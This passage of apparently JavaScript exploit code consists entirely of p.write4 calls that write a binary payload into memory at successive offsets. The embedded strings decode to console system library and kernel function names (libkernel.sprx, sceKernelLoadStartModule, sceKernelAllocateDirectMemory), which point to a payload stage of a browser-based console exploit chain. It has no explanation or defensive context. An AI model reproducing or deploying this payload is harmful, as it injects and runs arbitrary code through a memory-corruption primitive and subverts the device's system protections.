1692 |   p.write4(addr.add32(0x00001a68), 0x0b671c0d);
1693 |   p.write4(addr.add32(0x00001a6c), 0x3867354d);
1694 |   p.write4(addr.add32(0x00001a70), 0x3b3e90bc);
1695 |   p.write4(addr.add32(0x00001a74), 0xf2bc6caa);
1696 |   p.write4(addr.add32(0x00001a78), 0xd2459eeb);
1697 |   p.write4(addr.add32(0x00001a7c), 0x3aca2f09);
1698 |   p.write4(addr.add32(0x00001a80), 0xad36029c);
1699 |   p.write4(addr.add32(0x00001a84), 0xb2b1c12e);
1700 |   p.write4(addr.add32(0x00001a88), 0x6b1f7c6d);
1701 |   p.write4(addr.add32(0x00001a8c), 0x20628fa1);
1702 |   p.write4(addr.add32(0x00001a90), 0x366cd68c);
1703 |   p.write4(addr.add32(0x00001a94), 0x9e545ad6);
1704 |   p.write4(addr.add32(0x00001a98), 0x25a8a930);
1705 |   p.write4(addr.add32(0x00001a9c), 0x3e12943d);
1706 |   p.write4(addr.add32(0x00001aa0), 0xf01b160d);
1707 |   p.write4(addr.add32(0x00001aa4), 0xe0724286);
1708 |   p.write4(addr.add32(0x00001aa8), 0x68399cd6);
1709 |   p.write4(addr.add32(0x00001aac), 0x968011db);
1710 |   p.write4(addr.add32(0x00001ab0), 0x41712b18);
1711 |   p.write4(addr.add32(0x00001ab4), 0x17e87848);
1712 |   p.write4(addr.add32(0x00001ab8), 0x1f007d8b);
1713 |   p.write4(addr.add32(0x00001abc), 0x75d26816);
1714 |   p.write4(addr.add32(0x00001ac0), 0xf2e0b597);
1715 |   p.write4(addr.add32(0x00001ac4), 0xac750c6d);
1716 |   p.write4(addr.add32(0x00001ac8), 0xb1d5d916);
1717 |   p.write4(addr.add32(0x00001acc), 0xd0e88bb5);
1718 |   p.write4(addr.add32(0x00001ad0), 0x611fa7bf);
1719 |   p.write4(addr.add32(0x00001ad4), 0x68f8085b);
1720 |   p.write4(addr.add32(0x00001ad8), 0xbcd1f0e7);
1721 |   p.write4(addr.add32(0x00001adc), 0x55bf6039);
1722 |   p.write4(addr.add32(0x00001ae0), 0x30207c9c);
1723 |   p.write4(addr.add32(0x00001ae4), 0x442850e8);
1724 |   p.write4(addr.add32(0x00001ae8), 0x2a51ce02);
1725 |   p.write4(addr.add32(0x00001aec), 0xfddb5425);
1726 |   p.write4(addr.add32(0x00001af0), 0x9a974586);
1727 |   p.write4(addr.add32(0x00001af4), 0xe3f0171e);
1728 |   p.write4(addr.add32(0x00001af8), 0x120f92a5);
1729 |   p.write4(addr.add32(0x00001afc), 0xa64c5c2a);
1730 |   p.write4(addr.add32(0x00001b00), 0xe87fcfa5);
1731 |   p.write4(addr.add32(0x00001b04), 0x1a65f35b);
1732 |   p.write4(addr.add32(0x00001b08), 0xb99bcfc8);
1733 |   p.write4(addr.add32(0x00001b0c), 0x5d90c92a);
1734 |   p.write4(addr.add32(0x00001b10), 0xf6cf08d4);
1735 |   p.write4(addr.add32(0x00001b14), 0xfc5a5a03);
1736 |   p.write4(addr.add32(0x00001b18), 0x11dbb69e);
1737 |   p.write4(addr.add32(0x00001b1c), 0x623de2ed);
1738 |   p.write4(addr.add32(0x00001b20), 0x5d88fcc1);
1739 |   p.write4(addr.add32(0x00001b24), 0x2d31ac97);
1740 |   p.write4(addr.add32(0x00001b28), 0x70ad15c3);
1741 |   p.write4(addr.add32(0x00001b2c), 0x5aa0be05);
1742 |   p.write4(addr.add32(0x00001b30), 0x449c34e6);
1743 |   p.write4(addr.add32(0x00001b34), 0xfee52b78);
1744 |   p.write4(addr.add32(0x00001b38), 0x68d45638);
1745 |   p.write4(addr.add32(0x00001b3c), 0xe6a41383);
1746 |   p.write4(addr.add32(0x00001b40), 0xab9cd2fa);
1747 |   p.write4(addr.add32(0x00001b44), 0x105f89ac);
1748 |   p.write4(addr.add32(0x00001b48), 0x046f758f);
1749 |   p.write4(addr.add32(0x00001b4c), 0xbcb9aebc);
1750 |   p.write4(addr.add32(0x00001b50), 0xfa421db7);
1751 |   p.write4(addr.add32(0x00001b54), 0xb41f944e);
1752 |   p.write4(addr.add32(0x00001b58), 0x6b9c270a);
1753 |   p.write4(addr.add32(0x00001b5c), 0xebd2c7ab);
1754 |   p.write4(addr.add32(0x00001b60), 0x29524227);
1755 |   p.write4(addr.add32(0x00001b64), 0x4025c841);
1756 |   p.write4(addr.add32(0x00001b68), 0x6d48e054);
1757 |   p.write4(addr.add32(0x00001b6c), 0x84778023);
1758 |   p.write4(addr.add32(0x00001b70), 0x249b6f4d);
1759 |   p.write4(addr.add32(0x00001b74), 0x6b2afe51);
1760 |   p.write4(addr.add32(0x00001b78), 0x9ea18028);
1761 |   p.write4(addr.add32(0x00001b7c), 0xca186dbd);
1762 |   p.write4(addr.add32(0x00001b80), 0x799e7d8d);
1763 |   p.write4(addr.add32(0x00001b84), 0xebb8e05a);
1764 |   p.write4(addr.add32(0x00001b88), 0xd9f33dd1);
1765 |   p.write4(addr.add32(0x00001b8c), 0xa72a9002);
1766 |   p.write4(addr.add32(0x00001b90), 0xa29a7eb5);
1767 |   p.write4(addr.add32(0x00001b94), 0xa8212fd7);
1768 |   p.write4(addr.add32(0x00001b98), 0xa18c7d50);
1769 |   p.write4(addr.add32(0x00001b9c), 0x97bf2f91);
1770 |   p.write4(addr.add32(0x00001ba0), 0xc1c292be);
1771 |   p.write4(addr.add32(0x00001ba4), 0x1f0c8c0d);
1772 |   p.write4(addr.add32(0x00001ba8), 0x153531de);
1773 |   p.write4(addr.add32(0x00001bac), 0x97cc9039);
1774 |   p.write4(addr.add32(0x00001bb0), 0x097f2e47);
1775 |   p.write4(addr.add32(0x00001bb4), 0xce9cc3e9);
1776 |   p.write4(addr.add32(0x00001bb8), 0x58c8b291);
1777 |   p.write4(addr.add32(0x00001bbc), 0x1d70e876);
1778 |   p.write4(addr.add32(0x00001bc0), 0xe64a5f72);
1779 |   p.write4(addr.add32(0x00001bc4), 0x942236aa);
1780 |   p.write4(addr.add32(0x00001bc8), 0xb39052c6);
1781 |   p.write4(addr.add32(0x00001bcc), 0xeff09b9f);
1782 |   p.write4(addr.add32(0x00001bd0), 0xc3538e57);
1783 |   p.write4(addr.add32(0x00001bd4), 0xd7c930e3);
1784 |   p.write4(addr.add32(0x00001bd8), 0x790c3ab0);
1785 |   p.write4(addr.add32(0x00001bdc), 0xd4a8971b);
1786 |   p.write4(addr.add32(0x00001be0), 0xb0d22281);
1787 |   p.write4(addr.add32(0x00001be4), 0x007d6282);
1788 |   p.write4(addr.add32(0x00001be8), 0xc79e4758);
1789 |   p.write4(addr.add32(0x00001bec), 0x65b4e82d);
1790 |   p.write4(addr.add32(0x00001bf0), 0x6a7805be);
1791 |   p.write4(addr.add32(0x00001bf4), 0x5ac93189);
1792 |   p.write4(addr.add32(0x00001bf8), 0xc150de44);
1793 |   p.write4(addr.add32(0x00001bfc), 0x3e9dfdc7);
1794 |   p.write4(addr.add32(0x00001c00), 0x40174221);
1795 |   p.write4(addr.add32(0x00001c04), 0x41c9f979);
1796 |   p.write4(addr.add32(0x00001c08), 0x0fd7fcc1);
1797 |   p.write4(addr.add32(0x00001c0c), 0xe2a37634);
1798 |   p.write4(addr.add32(0x00001c10), 0x205a1bc0);
1799 |   p.write4(addr.add32(0x00001c14), 0x522faf0f);
1800 |   p.write4(addr.add32(0x00001c18), 0x723483cd);
1801 |   p.write4(addr.add32(0x00001c1c), 0x3312b3af);
1802 |   p.write4(addr.add32(0x00001c20), 0xb0202c21);
1803 |   p.write4(addr.add32(0x00001c24), 0xb12da0c6);
1804 |   p.write4(addr.add32(0x00001c28), 0xb0a7e359);
1805 |   p.write4(addr.add32(0x00001c2c), 0x5b4c1c4e);
1806 |   p.write4(addr.add32(0x00001c30), 0x509a105f);
1807 |   p.write4(addr.add32(0x00001c34), 0x7986cc18);
1808 |   p.write4(addr.add32(0x00001c38), 0x0210ff25);
1809 |   p.write4(addr.add32(0x00001c3c), 0xa903908f);
1810 |   p.write4(addr.add32(0x00001c40), 0x1cf2ba37);
1811 |   p.write4(addr.add32(0x00001c44), 0x4509cc13);
1812 |   p.write4(addr.add32(0x00001c48), 0x7455b815);
1813 |   p.write4(addr.add32(0x00001c4c), 0x0424280a);
1814 |   p.write4(addr.add32(0x00001c50), 0xb3ab19d1);
1815 |   p.write4(addr.add32(0x00001c54), 0xf8b644ca);
1816 |   p.write4(addr.add32(0x00001c58), 0x722ab13d);
1817 |   p.write4(addr.add32(0x00001c5c), 0x86e43588);
1818 |   p.write4(addr.add32(0x00001c60), 0x0847556b);
1819 |   p.write4(addr.add32(0x00001c64), 0x69ab1625);
1820 |   p.write4(addr.add32(0x00001c68), 0xfef6bf1d);
1821 |   p.write4(addr.add32(0x00001c6c), 0x00000002);
1822 |   p.write4(addr.add32(0x00001c70), 0x31000000);
1823 |   p.write4(addr.add32(0x00001c74), 0x00000000);
1824 |   p.write4(addr.add32(0x00001c78), 0x00000000);
1825 |   p.write4(addr.add32(0x00001c7c), 0x0000ff00);
1826 |   p.write4(addr.add32(0x00001c80), 0x00000000);
1827 |   p.write4(addr.add32(0x00001c84), 0x00000000);
1828 |   p.write4(addr.add32(0x00001c88), 0x00000000);
1829 |   p.write4(addr.add32(0x00001c8c), 0x00000000);
1830 |   p.write4(addr.add32(0x00001c90), 0x00000000);
1831 |   p.write4(addr.add32(0x00001c94), 0x40000000);
1832 |   p.write4(addr.add32(0x00001c98), 0x30003000);
1833 |   p.write4(addr.add32(0x00001c9c), 0x00000000);
1834 |   p.write4(addr.add32(0x00001ca0), 0x40000000);
1835 |   p.write4(addr.add32(0x00001ca4), 0x00000000);
1836 |   p.write4(addr.add32(0x00001ca8), 0x00800000);
1837 |   p.write4(addr.add32(0x00001cac), 0xffff4000);
1838 |   p.write4(addr.add32(0x00001cb0), 0xf0000000);
1839 |   p.write4(addr.add32(0x00001cb4), 0x00000000);
1840 |   p.write4(addr.add32(0x00001cb8), 0x00000000);
1841 |   p.write4(addr.add32(0x00001cbc), 0x00000000);
1842 |   p.write4(addr.add32(0x00001cc0), 0x00000000);
1843 |   p.write4(addr.add32(0x00001cc4), 0x00000000);
1844 |   p.write4(addr.add32(0x00001cc8), 0x00000000);
1845 |   p.write4(addr.add32(0x00001ccc), 0x00000000);
1846 |   p.write4(addr.add32(0x00001cd0), 0x00000000);
1847 |   p.write4(addr.add32(0x00001cd4), 0x00000000);
1848 |   p.write4(addr.add32(0x00001cd8), 0x00000000);
1849 |   p.write4(addr.add32(0x00001cdc), 0x00000000);
1850 |   p.write4(addr.add32(0x00001ce0), 0x00000000);
1851 |   p.write4(addr.add32(0x00001ce4), 0x00000000);
1852 |   p.write4(addr.add32(0x00001ce8), 0x00000000);
1853 |   p.write4(addr.add32(0x00001cec), 0x00000000);
1854 |   p.write4(addr.add32(0x00001cf0), 0x00000000);
1855 |   p.write4(addr.add32(0x00001cf4), 0x00000000);
1856 |   p.write4(addr.add32(0x00001cf8), 0x00000000);
1857 |   p.write4(addr.add32(0x00001cfc), 0x00000000);
1858 |   p.write4(addr.add32(0x00001d00), 0x00000000);
1859 |   p.write4(addr.add32(0x00001d04), 0x00000000);
1860 |   p.write4(addr.add32(0x00001d08), 0x00000000);
1861 |   p.write4(addr.add32(0x00001d0c), 0x00000001);
1862 |   p.write4(addr.add32(0x00001d10), 0x31000000);
1863 |   p.write4(addr.add32(0x00001d14), 0x00000000);
1864 |   p.write4(addr.add32(0x00001d18), 0x20000380);
1865 |   p.write4(addr.add32(0x00001d1c), 0x0000ff00);
1866 |   p.write4(addr.add32(0x00001d20), 0x00000000);
1867 |   p.write4(addr.add32(0x00001d24), 0x00000000);
1868 |   p.write4(addr.add32(0x00001d28), 0x00000000);
1869 |   p.write4(addr.add32(0x00001d2c), 0x00000000);
1870 |   p.write4(addr.add32(0x00001d30), 0x00000000);
1871 |   p.write4(addr.add32(0x00001d34), 0x40000000);
1872 |   p.write4(addr.add32(0x00001d38), 0x40004000);
1873 |   p.write4(addr.add32(0x00001d3c), 0x00000000);
1874 |   p.write4(addr.add32(0x00001d40), 0x40000000);
1875 |   p.write4(addr.add32(0x00001d44), 0x00000002);
1876 |   p.write4(addr.add32(0x00001d48), 0x00800000);
1877 |   p.write4(addr.add32(0x00001d4c), 0xffff4000);
1878 |   p.write4(addr.add32(0x00001d50), 0xf0000000);
1879 |   p.write4(addr.add32(0x00001d54), 0x00000000);
1880 |   p.write4(addr.add32(0x00001d58), 0x00000000);
1881 |   p.write4(addr.add32(0x00001d5c), 0x00000000);
1882 |   p.write4(addr.add32(0x00001d60), 0x00000000);
1883 |   p.write4(addr.add32(0x00001d64), 0x00000000);
1884 |   p.write4(addr.add32(0x00001d68), 0x00000000);
1885 |   p.write4(addr.add32(0x00001d6c), 0x00000000);
1886 |   p.write4(addr.add32(0x00001d70), 0x00000000);
1887 |   p.write4(addr.add32(0x00001d74), 0x00000000);
1888 |   p.write4(addr.add32(0x00001d78), 0x00000000);
1889 |   p.write4(addr.add32(0x00001d7c), 0x00000000);
1890 |   p.write4(addr.add32(0x00001d80), 0x00000000);
1891 |   p.write4(addr.add32(0x00001d84), 0x00000000);
1892 |   p.write4(addr.add32(0x00001d88), 0x00000000);
1893 |   p.write4(addr.add32(0x00001d8c), 0x00000000);
1894 |   p.write4(addr.add32(0x00001d90), 0x00000000);
1895 |   p.write4(addr.add32(0x00001d94), 0x9090c031);
1896 |   p.write4(addr.add32(0x00001d98), 0x00000090);
1897 |   p.write4(addr.add32(0x00001d9c), 0x00000000);
1898 |   p.write4(addr.add32(0x00001da0), 0x00000000);
1899 |   p.write4(addr.add32(0x00001da4), 0x00000000);
1900 |   p.write4(addr.add32(0x00001da8), 0x00000000);
1901 |   p.write4(addr.add32(0x00001dac), 0x000096e9);
1902 |   p.write4(addr.add32(0x00001db0), 0x90909000);
1903 |   p.write4(addr.add32(0x00001db4), 0x65726600);
1904 |   p.write4(addr.add32(0x00001db8), 0x00000065);
1905 |   p.write4(addr.add32(0x00001dbc), 0x00000000);
1906 |   p.write4(addr.add32(0x00001dc0), 0x00000000);
1907 |   p.write4(addr.add32(0x00001dc4), 0x00000000);
1908 |   p.write4(addr.add32(0x00001dc8), 0x00000000);
1909 |   p.write4(addr.add32(0x00001dcc), 0x0016d05b);
1910 |   p.write4(addr.add32(0x00001dd0), 0x0079980b);
1911 |   p.write4(addr.add32(0x00001dd4), 0x007e5a13);
1912 |   p.write4(addr.add32(0x00001dd8), 0x0094715b);
1913 |   p.write4(addr.add32(0x00001ddc), 0x0016d087);
1914 |   p.write4(addr.add32(0x00001de0), 0x0023747b);
1915 |   p.write4(addr.add32(0x00001de4), 0x00799837);
1916 |   p.write4(addr.add32(0x00001de8), 0x00947187);
1917 |   p.write4(addr.add32(0x00001dec), 0x0063e3a1);
1918 |   p.write4(addr.add32(0x00001df0), 0x00000000);
1919 |   p.write4(addr.add32(0x00001df4), 0x00000623);
1920 |   p.write4(addr.add32(0x00001df8), 0x00000000);
1921 |   p.write4(addr.add32(0x00001dfc), 0x0063eafc);
1922 |   p.write4(addr.add32(0x00001e00), 0x00000000);
1923 |   p.write4(addr.add32(0x00001e04), 0x000007b2);
1924 |   p.write4(addr.add32(0x00001e08), 0x00000000);
1925 |   p.write4(addr.add32(0x00001e0c), 0x0063f718);
1926 |   p.write4(addr.add32(0x00001e10), 0x00000000);
1927 |   p.write4(addr.add32(0x00001e14), 0x000007b2);
1928 |   p.write4(addr.add32(0x00001e18), 0x00000000);
1929 |   p.write4(addr.add32(0x00001e1c), 0x0064318b);
1930 |   p.write4(addr.add32(0x00001e20), 0x00000000);
1931 |   p.write4(addr.add32(0x00001e24), 0x000008b0);
1932 |   p.write4(addr.add32(0x00001e28), 0x00000000);
1933 |   p.write4(addr.add32(0x00001e2c), 0x00643da2);
1934 |   p.write4(addr.add32(0x00001e30), 0x00000000);
1935 |   p.write4(addr.add32(0x00001e34), 0x000008fe);
1936 |   p.write4(addr.add32(0x00001e38), 0x00000000);
1937 |   p.write4(addr.add32(0x00001e3c), 0x0064c720);
1938 |   p.write4(addr.add32(0x00001e40), 0x00000000);
1939 |   p.write4(addr.add32(0x00001e44), 0x00000146);
1940 |   p.write4(addr.add32(0x00001e48), 0x00000000);
1941 |   p.write4(addr.add32(0x00001e4c), 0x0064d4ff);
1942 |   p.write4(addr.add32(0x00001e50), 0x00000000);
1943 |   p.write4(addr.add32(0x00001e54), 0x00000192);
1944 |   p.write4(addr.add32(0x00001e58), 0x00000000);
1945 |   p.write4(addr.add32(0x00001e5c), 0x00624065);
1946 |   p.write4(addr.add32(0x00001e60), 0x00000000);
1947 |   p.write4(addr.add32(0x00001e64), 0x0000021f);
1948 |   p.write4(addr.add32(0x00001e68), 0x00000000);
1949 |   p.write4(addr.add32(0x00001e6c), 0x006aaad5);
1950 |   p.write4(addr.add32(0x00001e70), 0x00000000);
1951 |   p.write4(addr.add32(0x00001e74), 0x00000276);
1952 |   p.write4(addr.add32(0x00001e78), 0x00000000);
1953 |   p.write4(addr.add32(0x00001e7c), 0x006aad04);
1954 |   p.write4(addr.add32(0x00001e80), 0x00000000);
1955 |   p.write4(addr.add32(0x00001e84), 0x00000276);
1956 |   p.write4(addr.add32(0x00001e88), 0x00000000);
1957 |   p.write4(addr.add32(0x00001e8c), 0x00000000);
1958 |   p.write4(addr.add32(0x00001e90), 0x00000000);
1959 |   p.write4(addr.add32(0x00001e94), 0x00000000);
1960 |   p.write4(addr.add32(0x00001e98), 0x00000000);
1961 |   p.write4(addr.add32(0x00001e9c), 0x00000000);
1962 |   p.write4(addr.add32(0x00001ea0), 0x00000000);
1963 |   p.write4(addr.add32(0x00001ea4), 0x00000000);
1964 |   p.write4(addr.add32(0x00001ea8), 0x00000000);
1965 |   p.write4(addr.add32(0x00001eac), 0x0010e250);
1966 |   p.write4(addr.add32(0x00001eb0), 0x00000000);
1967 |   p.write4(addr.add32(0x00001eb4), 0x000015c8);
1968 |   p.write4(addr.add32(0x00001eb8), 0x00000000);
1969 |   p.write4(addr.add32(0x00001ebc), 0x0010e460);
1970 |   p.write4(addr.add32(0x00001ec0), 0x00000000);
1971 |   p.write4(addr.add32(0x00001ec4), 0x000015c0);
1972 |   p.write4(addr.add32(0x00001ec8), 0x00000000);
1973 |   p.write4(addr.add32(0x00001ecc), 0x001ea530);
1974 |   p.write4(addr.add32(0x00001ed0), 0x00000000);
1975 |   p.write4(addr.add32(0x00001ed4), 0x000015b8);
1976 |   p.write4(addr.add32(0x00001ed8), 0x00000000);
1977 |   p.write4(addr.add32(0x00001edc), 0x003205c0);
1978 |   p.write4(addr.add32(0x00001ee0), 0x00000000);
1979 |   p.write4(addr.add32(0x00001ee4), 0x000015b0);
1980 |   p.write4(addr.add32(0x00001ee8), 0x00000000);
1981 |   p.write4(addr.add32(0x00001eec), 0x00050ac0);
1982 |   p.write4(addr.add32(0x00001ef0), 0x00000000);
1983 |   p.write4(addr.add32(0x00001ef4), 0x000015a8);
1984 |   p.write4(addr.add32(0x00001ef8), 0x00000000);
1985 |   p.write4(addr.add32(0x00001efc), 0x000f5e10);
1986 |   p.write4(addr.add32(0x00001f00), 0x00000000);
1987 |   p.write4(addr.add32(0x00001f04), 0x000015a0);
1988 |   p.write4(addr.add32(0x00001f08), 0x00000000);
1989 |   p.write4(addr.add32(0x00001f0c), 0x000f5fd0);
1990 |   p.write4(addr.add32(0x00001f10), 0x00000000);
1991 |   p.write4(addr.add32(0x00001f14), 0x00001598);
1992 |   p.write4(addr.add32(0x00001f18), 0x00000000);
1993 |   p.write4(addr.add32(0x00001f1c), 0x001bff90);
1994 |   p.write4(addr.add32(0x00001f20), 0x00000000);
1995 |   p.write4(addr.add32(0x00001f24), 0x00001590);
1996 |   p.write4(addr.add32(0x00001f28), 0x00000000);
1997 |   p.write4(addr.add32(0x00001f2c), 0x001c0090);
1998 |   p.write4(addr.add32(0x00001f30), 0x00000000);
1999 |   p.write4(addr.add32(0x00001f34), 0x00001588);
2000 |   p.write4(addr.add32(0x00001f38), 0x00000000);
2001 |   p.write4(addr.add32(0x00001f3c), 0x014b4110);
2002 |   p.write4(addr.add32(0x00001f40), 0x00000000);
2003 |   p.write4(addr.add32(0x00001f44), 0x00001580);
2004 |   p.write4(addr.add32(0x00001f48), 0x00000000);
2005 |   p.write4(addr.add32(0x00001f4c), 0x0274c040);
2006 |   p.write4(addr.add32(0x00001f50), 0x00000000);
2007 |   p.write4(addr.add32(0x00001f54), 0x00001578);
2008 |   p.write4(addr.add32(0x00001f58), 0x00000000);
2009 |   p.write4(addr.add32(0x00001f5c), 0x014c9d48);
2010 |   p.write4(addr.add32(0x00001f60), 0x00000000);
2011 |   p.write4(addr.add32(0x00001f64), 0x00001570);
2012 |   p.write4(addr.add32(0x00001f68), 0x00000000);
2013 |   p.write4(addr.add32(0x00001f6c), 0x0271e208);
2014 |   p.write4(addr.add32(0x00001f70), 0x00000000);
2015 |   p.write4(addr.add32(0x00001f74), 0x00001568);
2016 |   p.write4(addr.add32(0x00001f78), 0x00000000);
2017 |   p.write4(addr.add32(0x00001f7c), 0x0271e5d8);
2018 |   p.write4(addr.add32(0x00001f80), 0x00000000);
2019 |   p.write4(addr.add32(0x00001f84), 0x00001560);
2020 |   p.write4(addr.add32(0x00001f88), 0x00000000);
2021 |   p.write4(addr.add32(0x00001f8c), 0x02382ff8);
2022 |   p.write4(addr.add32(0x00001f90), 0x00000000);
2023 |   p.write4(addr.add32(0x00001f94), 0x00001558);
2024 |   p.write4(addr.add32(0x00001f98), 0x00000000);
2025 |   p.write4(addr.add32(0x00001f9c), 0x006418e0);
2026 |   p.write4(addr.add32(0x00001fa0), 0x00000000);
2027 |   p.write4(addr.add32(0x00001fa4), 0x00001550);
2028 |   p.write4(addr.add32(0x00001fa8), 0x00000000);
2029 |   p.write4(addr.add32(0x00001fac), 0x00632540);
2030 |   p.write4(addr.add32(0x00001fb0), 0x00000000);
2031 |   p.write4(addr.add32(0x00001fb4), 0x00001548);
2032 |   p.write4(addr.add32(0x00001fb8), 0x00000000);
2033 |   p.write4(addr.add32(0x00001fbc), 0x0063cd40);
2034 |   p.write4(addr.add32(0x00001fc0), 0x00000000);
2035 |   p.write4(addr.add32(0x00001fc4), 0x00001540);
2036 |   p.write4(addr.add32(0x00001fc8), 0x00000000);
2037 |   p.write4(addr.add32(0x00001fcc), 0x0063c4f0);
2038 |   p.write4(addr.add32(0x00001fd0), 0x00000000);
2039 |   p.write4(addr.add32(0x00001fd4), 0x00001538);
2040 |   p.write4(addr.add32(0x00001fd8), 0x00000000);
2041 |   p.write4(addr.add32(0x00001fdc), 0x00642b40);
2042 |   p.write4(addr.add32(0x00001fe0), 0x00000000);
2043 |   p.write4(addr.add32(0x00001fe4), 0x00001530);
2044 |   p.write4(addr.add32(0x00001fe8), 0x00000000);
2045 |   p.write4(addr.add32(0x00001fec), 0x0062d480);
2046 |   p.write4(addr.add32(0x00001ff0), 0x00000000);
2047 |   p.write4(addr.add32(0x00001ff4), 0x00001528);
2048 |   p.write4(addr.add32(0x00001ff8), 0x00000000);
2049 |   p.write4(addr.add32(0x00001ffc), 0x0061efa0);
2050 |   p.write4(addr.add32(0x00002000), 0x00000000);
2051 |   p.write4(addr.add32(0x00002004), 0x00001520);
2052 |   p.write4(addr.add32(0x00002008), 0x00000000);
2053 |   p.write4(addr.add32(0x0000200c), 0x0062db10);
2054 |   p.write4(addr.add32(0x00002010), 0x00000000);
2055 |   p.write4(addr.add32(0x00002014), 0x00001518);
2056 |   p.write4(addr.add32(0x00002018), 0x00000000);
2057 |   p.write4(addr.add32(0x0000201c), 0x0062d780);
2058 |   p.write4(addr.add32(0x00002020), 0x00000000);
2059 |   p.write4(addr.add32(0x00002024), 0x00001510);
2060 |   p.write4(addr.add32(0x00002028), 0x00000000);
2061 |   p.write4(addr.add32(0x0000202c), 0x0062e2a0);
2062 |   p.write4(addr.add32(0x00002030), 0x00000000);
2063 |   p.write4(addr.add32(0x00002034), 0x00001508);
2064 |   p.write4(addr.add32(0x00002038), 0x00000000);
2065 |   p.write4(addr.add32(0x0000203c), 0x0061d7f0);
2066 |   p.write4(addr.add32(0x00002040), 0x00000000);
2067 |   p.write4(addr.add32(0x00002044), 0x00001500);
2068 |   p.write4(addr.add32(0x00002048), 0x00000000);
2069 |   p.write4(addr.add32(0x0000204c), 0x001fd7d0);
2070 |   p.write4(addr.add32(0x00002050), 0x00000000);
2071 |   p.write4(addr.add32(0x00002054), 0x000014f8);
2072 |   p.write4(addr.add32(0x00002058), 0x00000000);
2073 |   p.write4(addr.add32(0x0000205c), 0x003a2bd0);
2074 |   p.write4(addr.add32(0x00002060), 0x00000000);
2075 |   p.write4(addr.add32(0x00002064), 0x000014f0);
2076 |   p.write4(addr.add32(0x00002068), 0x00000000);
2077 |   p.write4(addr.add32(0x0000206c), 0x003a2e00);
2078 |   p.write4(addr.add32(0x00002070), 0x00000000);
2079 |   p.write4(addr.add32(0x00002074), 0x000014e8);
2080 |   p.write4(addr.add32(0x00002078), 0x00000000);
2081 |   p.write4(addr.add32(0x0000207c), 0x002d55b0);
2082 |   p.write4(addr.add32(0x00002080), 0x00000000);
2083 |   p.write4(addr.add32(0x00002084), 0x000014e0);
2084 |   p.write4(addr.add32(0x00002088), 0x00000000);
2085 |   p.write4(addr.add32(0x0000208c), 0x0030d150);
2086 |   p.write4(addr.add32(0x00002090), 0x00000000);
2087 |   p.write4(addr.add32(0x00002094), 0x000014d8);
2088 |   p.write4(addr.add32(0x00002098), 0x00000000);
2089 |   p.write4(addr.add32(0x0000209c), 0x0019ef90);
2090 |   p.write4(addr.add32(0x000020a0), 0x00000000);
2091 |   p.write4(addr.add32(0x000020a4), 0x000014d0);
2092 |   p.write4(addr.add32(0x000020a8), 0x00000000);
2093 |   p.write4(addr.add32(0x000020ac), 0x0019edc0);
2094 |   p.write4(addr.add32(0x000020b0), 0x00000000);
2095 |   p.write4(addr.add32(0x000020b4), 0x000014c8);
2096 |   p.write4(addr.add32(0x000020b8), 0x00000000);
2097 |   p.write4(addr.add32(0x000020bc), 0x0019f140);
2098 |   p.write4(addr.add32(0x000020c0), 0x00000000);
2099 |   p.write4(addr.add32(0x000020c4), 0x000014c0);
2100 |   p.write4(addr.add32(0x000020c8), 0x00000000);
2101 |   p.write4(addr.add32(0x000020cc), 0x0019f190);
2102 |   p.write4(addr.add32(0x000020d0), 0x00000000);
2103 |   p.write4(addr.add32(0x000020d4), 0x000014b8);
2104 |   p.write4(addr.add32(0x000020d8), 0x00000000);
2105 |   p.write4(addr.add32(0x000020dc), 0x0019f760);
2106 |   p.write4(addr.add32(0x000020e0), 0x00000000);
2107 |   p.write4(addr.add32(0x000020e4), 0x000014b0);
2108 |   p.write4(addr.add32(0x000020e8), 0x00000000);
2109 |   p.write4(addr.add32(0x000020ec), 0x00000000);
2110 |   p.write4(addr.add32(0x000020f0), 0x00000000);
2111 |   p.write4(addr.add32(0x000020f4), 0x00000000);
2112 |   p.write4(addr.add32(0x000020f8), 0x00000000);
2113 |   p.write4(addr.add32(0x000020fc), 0x000014b0);
2114 |   p.write4(addr.add32(0x00002100), 0x6b62696c);
2115 |   p.write4(addr.add32(0x00002104), 0x656e7265);
2116 |   p.write4(addr.add32(0x00002108), 0x70732e6c);
2117 |   p.write4(addr.add32(0x0000210c), 0x6c007872);
2118 |   p.write4(addr.add32(0x00002110), 0x656b6269);
2119 |   p.write4(addr.add32(0x00002114), 0x6c656e72);
2120 |   p.write4(addr.add32(0x00002118), 0x6265775f);
2121 |   p.write4(addr.add32(0x0000211c), 0x7270732e);
2122 |   p.write4(addr.add32(0x00002120), 0x696c0078);
2123 |   p.write4(addr.add32(0x00002124), 0x72656b62);
2124 |   p.write4(addr.add32(0x00002128), 0x5f6c656e);
2125 |   p.write4(addr.add32(0x0000212c), 0x2e737973);
2126 |   p.write4(addr.add32(0x00002130), 0x78727073);
2127 |   p.write4(addr.add32(0x00002134), 0x735f5f00);
2128 |   p.write4(addr.add32(0x00002138), 0x6b636174);
2129 |   p.write4(addr.add32(0x0000213c), 0x6b68635f);
2130 |   p.write4(addr.add32(0x00002140), 0x6175675f);
2131 |   p.write4(addr.add32(0x00002144), 0x5f006472);
2132 |   p.write4(addr.add32(0x00002148), 0x6174735f);
2133 |   p.write4(addr.add32(0x0000214c), 0x635f6b63);
2134 |   p.write4(addr.add32(0x00002150), 0x665f6b68);
2135 |   p.write4(addr.add32(0x00002154), 0x006c6961);
2136 |   p.write4(addr.add32(0x00002158), 0x72655f5f);
2137 |   p.write4(addr.add32(0x0000215c), 0x00726f72);
2138 |   p.write4(addr.add32(0x00002160), 0x4b656373);
2139 |   p.write4(addr.add32(0x00002164), 0x656e7265);
2140 |   p.write4(addr.add32(0x00002168), 0x7272456c);
2141 |   p.write4(addr.add32(0x0000216c), 0x7300726f);
2142 |   p.write4(addr.add32(0x00002170), 0x654b6563);
2143 |   p.write4(addr.add32(0x00002174), 0x6c656e72);
2144 |   p.write4(addr.add32(0x00002178), 0x64616f4c);
2145 |   p.write4(addr.add32(0x0000217c), 0x72617453);
2146 |   p.write4(addr.add32(0x00002180), 0x646f4d74);
2147 |   p.write4(addr.add32(0x00002184), 0x00656c75);
2148 |   p.write4(addr.add32(0x00002188), 0x4b656373);
2149 |   p.write4(addr.add32(0x0000218c), 0x656e7265);
2150 |   p.write4(addr.add32(0x00002190), 0x6c6c416c);
2151 |   p.write4(addr.add32(0x00002194), 0x7461636f);
2152 |   p.write4(addr.add32(0x00002198), 0x72694465);
2153 |   p.write4(addr.add32(0x0000219c), 0x4d746365);
2154 |   p.write4(addr.add32(0x000021a0), 0x726f6d65);
2155 |   p.write4(addr.add32(0x000021a4), 0x63730079);
